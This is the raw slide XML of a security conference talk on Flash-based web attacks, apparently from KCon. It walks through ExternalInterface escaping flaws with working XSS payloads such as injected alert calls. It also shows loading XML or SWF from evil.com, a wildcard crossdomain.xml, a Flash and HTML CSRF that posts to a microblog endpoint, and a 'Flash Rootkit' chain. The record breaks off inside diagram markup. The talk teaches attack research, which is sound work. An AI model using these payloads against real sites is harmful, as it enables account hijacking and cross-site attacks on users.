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6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单击编辑备注格式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&lt;页眉&gt;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36C1439-4D3B-4F6D-ADD8-77228EDA7A6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861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23E4A67-6E9A-43FF-9748-D76F1E157176}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体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027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比HTML DOM的权限复杂度高太多了！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BB53A1C-FF80-4BF2-ADCF-6F558BF6185D}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体"/>
              </a:rPr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880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图片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图片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11280" y="1484280"/>
            <a:ext cx="8100360" cy="146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Hidden Battlefield: Flash-Based Web Attacks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1332000" y="3141720"/>
            <a:ext cx="6400080" cy="122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D9D9D9"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>Cos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  <a:latin typeface="微软雅黑"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>JavaScript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微软雅黑"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>Key Points in Flash-Based Web Attacks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JavaScript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The interaction between ActionScript and JavaScript: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Enlarged attack scope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The essence is DOM operation.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Transfer value to ActionScript in the form of XML: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DOM hijacking is easy.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The impact brought by DOM’s certain security vulnerability might be fatal.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DOM Operation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379800" y="1628640"/>
            <a:ext cx="8439840" cy="420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function __flash__arrayToXML(obj)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var s = "&lt;array&gt;";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for (var i=0; i&lt;obj.length; i++)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	s += "&lt;property id=\"" + i + "\"&gt;" + __flash__toXML(obj[i]) + "&lt;/property&gt;";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return s+"&lt;/array&gt;";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function __flash__argumentsToXML(obj,index)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var s = "&lt;arguments&gt;";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for (var i=index; i&lt;obj.length; i++)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	s += __flash__toXML(obj[i]);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return s+"&lt;/arguments&gt;";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DOM Operation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79800" y="1596960"/>
            <a:ext cx="8439840" cy="338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function __flash__objectToXML(obj)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var s = "&lt;object&gt;";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for (var prop in obj)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	s += "&lt;property id=\"" + prop + "\"&gt;" + __flash__toXML(obj[prop]) + "&lt;/property&gt;";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return s+"&lt;/object&gt;";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function __flash__escapeXML(s)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return s.replace(/&amp;/g, "&amp;amp;").replace(/&lt;/g, "&amp;lt;").replace(/&gt;/g, "&amp;gt;").replace(/"/g, "&amp;quot;").replace(/'/g, "&amp;apos;");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DOM Operation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379800" y="1268640"/>
            <a:ext cx="8439840" cy="544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function __flash__toXML(value)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   var type = typeof(value);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	if (type == "string")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		return "&lt;string&gt;" + __flash__escapeXML(value) + "&lt;/string&gt;";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	} else if (type == "undefined")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        return "&lt;undefined/&gt;";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	} else if (type == "number")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        return "&lt;number&gt;" + value + "&lt;/number&gt;";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	} else if (value == null)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        return "&lt;null/&gt;";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	} else if (type == "boolean")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        return value ? "&lt;true/&gt;" : "&lt;false/&gt;";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	} else if (value instanceof Date)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        return "&lt;date&gt;" + value.getTime() + "&lt;/date&gt;";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   } else if (value instanceof Array)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       return __flash__arrayToXML(value);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   } else if (type == "object")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       return __flash__objectToXML(value);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   } else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	    return "&lt;null/&gt;"; //???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宋体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DOM Operation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79800" y="1574640"/>
            <a:ext cx="8439840" cy="310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function __flash__addCallback(instance, name)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instance[name] = function () {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  return eval(instance.CallFunction("&lt;invoke name=\""+name+"\" returntype=\"javascript\"&gt;" + __flash__argumentsToXML(arguments,0) + "&lt;/invoke&gt;"));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function __flash__removeCallback(instance, name)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instance[name] = null;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JavaScript Implementation 1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javascript pseudo-protocol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AS2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getURL("javascript:alert(1)")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AS3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navigateToURL(new URLRequest('javascript:alert(1)'),"_self");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JavaScript Implementation 2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>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>ExternalInterface.call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微软雅黑"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>a=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>&amp;c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>alert(1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>try { __flash__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>toXML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>("alert(1)")</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>;} catch (e) { "&lt;undefined/&gt;"; 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9" name="CustomShape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="540720" y="2205000"/>
            <a:ext cx="6889320" cy="1553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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体"/>
              </a:rPr>
              <a:t>var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宋体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alibri"/>
                <a:ea typeface="宋体"/>
              </a:rPr>
              <a:t>param:Object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宋体"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体"/>
              </a:rPr>
              <a:t>root.loaderInfo.parameters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宋体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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体"/>
              </a:rPr>
              <a:t>var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宋体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alibri"/>
                <a:ea typeface="宋体"/>
              </a:rPr>
              <a:t>action:String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宋体"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体"/>
              </a:rPr>
              <a:t>param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宋体"/>
              </a:rPr>
              <a:t>["a"];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err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体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alibri"/>
                <a:ea typeface="宋体"/>
              </a:rPr>
              <a:t>cmd:String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宋体"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体"/>
              </a:rPr>
              <a:t>param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宋体"/>
              </a:rPr>
              <a:t>["c"];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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体"/>
              </a:rPr>
              <a:t>flash.external.ExternalInterface.call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宋体"/>
              </a:rPr>
              <a:t>(action, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体"/>
              </a:rPr>
              <a:t>cmd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宋体"/>
              </a:rPr>
              <a:t>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JavaScript Implementation 2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a=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>a());}catch(e){</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>(2);}//</a:t>
            </a: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&amp;c=alert(1)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try { __flash__toXML(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>a());}catch(e){</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>(2);}//</a:t>
            </a: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("alert(1)")) ; } catch (e) { "&lt;undefined/&gt;";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JavaScript Implementation 2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a=a&amp;c=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>\"));}catch(e){</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>(1);}//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try { __flash__toXML(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>a("\\"));}catch(e){</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>(1);}//</a:t>
            </a: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")) ; } catch (e) { "&lt;undefined/&gt;";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cat readme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KNOWNSEC VP, 404 Lab Leader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KCon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kcon.knownsec.com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Sebug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sebug.net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ZoomEye - CyberSpace Search Engine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zoomeye.org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Web2.0 Hacker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Web Front-End Hacker's Handbook (《Web前端黑客技术揭秘》)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web2hack.org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JavaScript Implementation 2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Fundamental flaw of ExternalInterface.call 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" escape to \"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\" escape to \\"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Should be：\" escape to \\\"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\escape failure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JavaScript Implementation 3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ExternalInterface.addCallback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document.getElementById("swf").test();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__flash__addCallback(document.getElementById("swf_ie"), "test");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0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>"aa\\";</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>(document.domain);//aa"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883800" y="2322720"/>
            <a:ext cx="5902200" cy="1735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import flash.external.ExternalInterface;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function test(k:String="default"):String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var str:String = '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体"/>
              </a:rPr>
              <a:t>aa\\";alert(document.domain);//aa</a:t>
            </a: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';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return str;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ExternalInterface.addCallback("test", test);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  <a:latin typeface="微软雅黑"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>Input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微软雅黑"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>Key Points in Flash-Based Web Attacks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URL Parameters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AS2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_root.argv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_global.argv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_level0.argv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uninitialized global variables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AS3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root.loaderInfo.parameters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XML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XML file as input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http://foo.com/f.swf?xml=//evil.com/e.xml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XML is the most preferable data format of Flash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new URLRequest('http://evil.com/e.xml')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Socket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LocalConnection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allowDomain('*')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Exposed socket related interface can be input.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Non-HTTP-level rules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LSO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微软雅黑"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>LSO(Flash Cookie)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600">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>SharedObject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600">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>+ ExternalInterface.addCallback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微软雅黑"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>Control LSO value through addCallback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微软雅黑"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>Automatically implement addCallback defect: able to  implement JavaScript automatically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0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>Refer to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>Flash Rootkit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t> section for more details</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑"/>
                <a:ea typeface="微软雅黑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SWF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SWF file as input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http://foo.com/f.swf?swf=//evil.com/e.swf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http://evil.com/e.swf?swf=//foo.com/f.swf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AS2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loadMovie()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AS3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new Loader() + URLRequest(URLLoader)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0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>Refer to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>XSF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>section for more details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  <a:latin typeface="微软雅黑"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>HTTP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微软雅黑"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>Key Points in Flash-Based Web Attacks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HTTP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LoadVars/sendAndLoad/sendToURL/URLLoader/URLRequest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GET/POST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Follow the browser's same-origin policy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Flash-specific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crossdomain.xml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Security.allowDomain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Might lead to an unexpected cross-domain surprise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ls -l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Key Points in Flash-based Web Attack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Vulnerability Exploitation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Vulnerability Mining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  <a:latin typeface="微软雅黑"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>Vulnerability Exploitation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  <a:latin typeface="微软雅黑"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>Flash XSS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微软雅黑"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>Vulnerability Exploitation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XSS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Only note that IE has the following attributes:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="181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2280" y="2189520"/>
            <a:ext cx="7399080" cy="39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  <a:latin typeface="微软雅黑"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>Flash CSRF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微软雅黑"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>Vulnerability Exploitation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CSRF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GET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Use the flawed SWF in target domain to send GET type CSRF indirectly so that target domain Referer can be related.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POST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Not much differences between pure POST and conventional CSRF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Its only advantage is being very quiet, but this is usually fatal.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Get Info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crossdomain.xml’s authorization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5081040" y="4965120"/>
            <a:ext cx="3716280" cy="1187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&lt;?xml version="1.0"?&gt;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&lt;cross-domain-policy&gt;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&lt;allow-access-from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体"/>
              </a:rPr>
              <a:t>domain="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体"/>
              </a:rPr>
              <a:t>*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="宋体"/>
              </a:rPr>
              <a:t>" </a:t>
            </a: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/&gt;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&lt;/cross-domain-policy&gt;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CSRF DEMO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457200" y="1556640"/>
            <a:ext cx="8228880" cy="456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Sohu Weibo</a:t>
            </a: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539640" y="2133000"/>
            <a:ext cx="9014400" cy="447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&lt;form action="http://t.xxx.com/article/updatetweet" method="post"&gt;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&lt;input type="hidden" name="status" value="html_csrf_here." /&gt;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&lt;/form&gt;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&lt;script&gt;document.forms[0].submit();&lt;/script&gt;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JSON file download notification will appear after success, making CSRF close to exposure.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import flash.net.URLRequest;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function post(msg){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  var url = new URLRequest("http://t.xxx.com/article/updatetweet");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  var _v = new URLVariables();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  _v = "status="+msg; url.method = "POST"; url.data = _v;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  sendToURL(url);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post('flash_csrf_here'); // perfect :)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CSRF Worm DEMO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Fanfou Flash Worm 2008</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="192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60600" y="2286000"/>
            <a:ext cx="6022440" cy="383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  <a:latin typeface="微软雅黑"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>Watermark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微软雅黑"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>Vulnerability Exploitation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LSO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Flash Cookie is once shared across browsers.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Cool for developers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Also cool for attackers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Hard to be cleaned up compared with traditional HTTP Cookie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Even if user changes IP or updates browser，unique identification is still possible.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Current status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Chrome isolated Flash Cookie.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  <a:latin typeface="微软雅黑"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>Flash Rootkit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微软雅黑"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>Vulnerability Exploitation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  <a:latin typeface="微软雅黑"/>
                <a:ea typeface="微软雅黑"/>
              </a:rPr>
              <a:t>Key Points in Flash-Based Web Attacks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Rootkit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LSO+allowDomain('*')+addCallback flaw = Flash Rootkit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2944800" y="3288960"/>
            <a:ext cx="1295280" cy="79128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Evil Site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Page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1422360" y="3360960"/>
            <a:ext cx="647280" cy="647280"/>
          </a:xfrm>
          <a:prstGeom prst="smileyFace">
            <a:avLst>
              <a:gd name="adj" fmla="val 4653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03" name="CustomShape 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2183400" y="3684960"/>
            <a:ext cx="647280" cy="360"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9360">
            <a:solidFill>
              <a:srgbClr val="BE4B48"/>
            </a:solidFill>
            <a:round/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="204" name="CustomShape 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2944800" y="4766400"/>
            <a:ext cx="1295280" cy="79128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Foo Site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SWF</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="205" name="CustomShape 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3592800" y="4278960"/>
            <a:ext cx="360" cy="304200"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9360">
            <a:solidFill>
              <a:srgbClr val="BE4B48"/>
            </a:solidFill>
            <a:round/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="206" name="CustomShape 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1366200" y="4238280"/>
            <a:ext cx="21985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Calibri"/>
                <a:ea typeface="宋体"/>
              </a:rPr>
              <a:t>DOM object/embed</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="207" name="CustomShape 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6425640" y="4766400"/>
            <a:ext cx="1295280" cy="79128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Foo Site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LSO</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="208" name="CustomShape 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4429080" y="5162400"/>
            <a:ext cx="1786320" cy="360"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9360">
            <a:solidFill>
              <a:srgbClr val="BE4B48"/>
            </a:solidFill>
            <a:round/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="209" name="CustomShape 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4348800" y="4717800"/>
            <a:ext cx="20887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Calibri"/>
                <a:ea typeface="宋体"/>
              </a:rPr>
              <a:t>addCallback Magic</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="210" name="CustomShape 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4576680" y="5151960"/>
            <a:ext cx="159048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Calibri"/>
                <a:ea typeface="宋体"/>
              </a:rPr>
              <a:t>Evil JavaScript</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="211" name="CustomShape 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6425640" y="3285000"/>
            <a:ext cx="1295280" cy="79128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Foo Site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Page</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="212" name="CustomShape 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2257920" y="3288960"/>
            <a:ext cx="4093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①</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="213" name="CustomShape 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3642840" y="4224960"/>
            <a:ext cx="4093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②</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="214" name="CustomShape 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4348800" y="5196600"/>
            <a:ext cx="4093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③</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="215" name="CustomShape 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4354200" y="3679560"/>
            <a:ext cx="1885320" cy="971280"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9360">
            <a:solidFill>
              <a:srgbClr val="BE4B48"/>
            </a:solidFill>
            <a:round/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="216" name="CustomShape 18"/>
